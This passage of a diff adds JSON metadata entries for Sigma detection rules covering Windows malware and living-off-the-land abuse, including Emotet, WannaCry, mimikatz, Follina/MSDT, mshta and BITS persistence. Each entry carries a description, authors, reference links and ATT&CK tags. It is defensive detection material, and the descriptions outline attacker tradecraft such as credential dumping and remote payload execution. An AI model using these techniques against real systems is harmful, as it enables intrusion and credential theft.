"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "value": "Emotet Process Creation" + }, + { + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_formbook.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", + "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", + "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", + "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "value": "Formbook Process Creation" + }, + { + "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", + "meta": { + "author": "Florian Roth, Tom Ueltschi", + "creation_date": "2019/01/16", + "falsepositive": [ + "Admin activity" + ], + "filename": "proc_creation_win_malware_notpetya.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/schroedingers-petya/78870/", + "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.t1070.001", + "attack.credential_access", + "attack.t1003.001", + "car.2016-04-002" + ] + }, + "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1", + "value": "NotPetya Ransomware Activity" + }, + { + "description": "Detects QBot like process executions", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_qbot.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/killamjr/status/1179034907932315648", + "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ] + }, + "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "value": "QBot Process Creation" + }, + { + "description": "Detects Ryuk ransomware activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_ryuk.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844", + "value": "Ryuk Ransomware" + }, + { + "description": "Detects wscript/cscript executions of scripts located in user directories", + "meta": { + "author": "Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "Winzip", + "Other self-extractors" + ], + "filename": "proc_creation_win_malware_script_dropper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "cea72823-df4d-4567-950c-0b579eaf0846", + "value": "WScript or CScript Dropper" + }, + { + "description": "Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.", + "meta": { + "author": "David Burkett, Florian Roth", + "creation_date": "2019/12/28", + "falsepositive": [ + "Rare System Admin Activity" + ], + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ] + }, + "uuid": "410ad193-a728-4107-bc79-4419789fcbf8", + "value": "Trickbot Malware Recon Activity" + }, + { + "description": "Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_trickbot_wermgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559" + ] + }, + "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "value": "Trickbot Malware Activity" + }, + { + "description": "Detects WannaCry ransomware activity", + "meta": { + "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_wannacry.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ] + }, + "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079", + "value": "WannaCry Ransomware" + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "meta": { + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2017/11/10", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_mal_adwind.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "value": "Adwind RAT / JRAT" + }, + { + "description": "Attempts to detect system changes made by Blue Mockingbird", + "meta": { + "author": "Trent Liffick (@tliffick)", + "creation_date": "2020/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mal_blue_mockingbird.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_blue_mockingbird.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112", + "attack.t1047" + ] + }, + "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "value": "Blue Mockingbird" + }, + { + "description": "Detects DarkSide Ransomware and helpers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/14", + "falsepositive": [ + "Unknown", + "UAC bypass method used by other malware" + ], + "filename": "proc_creation_win_mal_darkside_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", + "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ] + }, + "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "value": "DarkSide Ransomware Pattern" + }, + { + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mal_hermetic_wiper_activity.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f", + "value": "Hermetic Wiper TG Process Patterns" + }, + { + "description": "Detects LockerGoga Ransomware command line.", + "meta": { + "author": "Vasiliy Burov, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_mal_lockergoga_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", + "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", + "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "74db3488-fd28-480a-95aa-b7af626de068", + "value": "LockerGoga Ransomware" + }, + { + "description": "Detects Ryuk Ransomware command lines", + "meta": { + "author": "Vasiliy Burov", + "creation_date": "2019/08/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_mal_ryuk.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_ryuk.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ] + }, + "uuid": "0acaad27-9f02-4136-a243-c357202edd74", + "value": "Ryuk Ransomware Command Line Activity" + }, + { + "description": "Detects a usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_manage_bde_lolbas.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", + "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", + "https://twitter.com/bohops/status/980659399495741441", + "https://twitter.com/JohnLaTwC/status/1223292479270600706", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", + "value": "Suspicious Usage of the Manage-bde.wsf Script" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" + ], + "filename": "proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "15619216-e993-4721-b590-4c520615a67d", + "value": "Meterpreter or Cobalt Strike Getsystem Service Start" + }, + { + "description": "Detection well-known mimikatz command line arguments", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "filename": "proc_creation_win_mimikatz_command_line.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" + ] + }, + "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "value": "Mimikatz Command Line" + }, + { + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "meta": { + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "creation_date": "2020/03/04", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_mmc20_lateral_movement.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml" + ], + "tags": [ + "attack.execution", + "attack.t1021.003" + ] + }, + "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "value": "MMC20 Lateral Movement" + }, + { + "description": "Detects a Windows command line executable started from MMC", + "meta": { + "author": "Karneades, Swisscom CSIRT", + "creation_date": "2019/08/05", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_mmc_spawn_shell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_spawn_shell.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "value": "MMC Spawning Windows Shell" + }, + { + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_modify_group_policy_settings.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modify_group_policy_settings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" + ] + }, + "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", + "value": "Modify Group Policy Settings" + }, + { + "description": "Detects modification of an existing service on a compromised host in order to execute an arbitrary payload when the service is started or killed as a method of persistence.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_modif_of_services_for_via_commandline.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" + ] + }, + "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df", + "value": "Modification Of Existing Services For Persistence" + }, + { + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "meta": { + "author": "Sreeman", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_monitoring_for_persistence_via_bits.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", + "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1197" + ] + }, + "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "value": "Monitoring For Persistence Via BITS" + }, + { + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/13", + "falsepositive": [ + "Legitimate uses of Mouse Lock software" + ], + "filename": "proc_creation_win_mouse_lock.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", + "https://sourceforge.net/projects/mouselock/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml" + ], + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ] + }, + "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "value": "Mouse Lock Credential Gathering" + }, + { + "description": "Detects file execution using the msdeploy.exe lolbin", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_msdeploy.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", + "https://twitter.com/pabraeken/status/995837734379032576", + "https://twitter.com/pabraeken/status/999090532839313408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", + "value": "Execute Files with Msdeploy.exe" + }, + { + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "meta": { + "author": "Nasreddine Bencherchali (rule)", + "creation_date": "2022/05/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msdt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/_JohnHammond/status/1531672601067675648", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "value": "Execute Arbitrary Commands Using MSDT.EXE" + }, + { + "description": "Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in CVE-2022-30190", + "meta": { + "author": "GossiTheDog (rule), frack113 (sigma version)", + "creation_date": "2022/06/09", + "falsepositive": [ + "Legitimate usage of \".diagcab\" files" + ], + "filename": "proc_creation_win_msdt_diagcab.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", + "value": "Execute MSDT.EXE Using Diagcab File" + }, + { + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/21", + "falsepositive": [ + "Legitimate usage of \".diagcab\" files" + ], + "filename": "proc_creation_win_msdt_susp_cab_options.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1537896324837781506", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "value": "MSDT.EXE Execution With Suspicious Cab Option" + }, + { + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msdt_susp_parent.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" + ] + }, + "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", + "value": "MSDT Executed with Suspicious Parent" + }, + { + "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + ], + "filename": "proc_creation_win_msedge_minimized_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", + "value": "Suspicious Minimized MSEdge Start" + }, + { + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mshta_http.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.005" + ] + }, + "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", + "value": "Mshta Remotely Hosted HTA File Execution" + }, + { + "description": "Identifies suspicious mshta.exe commands.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mshta_javascript.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005" + ] + }, + "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", + "value": "Mshta JavaScript Execution" + }, + { + "description": "Detects a Windows command line executable started from MSHTA", + "meta": { + "author": "Michael Haag", + "creation_date": "2019/01/16", + "falsepositive": [ + "Printer software / driver installations", + "HP software" + ], + "filename": "proc_creation_win_mshta_spawn_shell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trustedsec.com/july-2015/malicious-htas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_spawn_shell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" + ] + }, + "uuid": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "value": "MSHTA Spawning Windows Shell" + }, + { + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", + "meta": { + "author": "frack113", + "creation_date": "2022/04/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msiexec_dll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://twitter.com/_st0pp3r_/status/1583914515996897281", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "value": "Suspicious Msiexec Load DLL" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "meta": { + "author": "frack113", + "creation_date": "2022/04/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msiexec_embedding.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" + ], + "tags": [ + "attack.t1218.007", + "attack.defense_evasion" + ] + }, + "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "value": "Suspicious MsiExec Embedding Parent" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate script" + ], + "filename": "proc_creation_win_msiexec_execute_dll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://twitter.com/_st0pp3r_/status/1583914515996897281", + 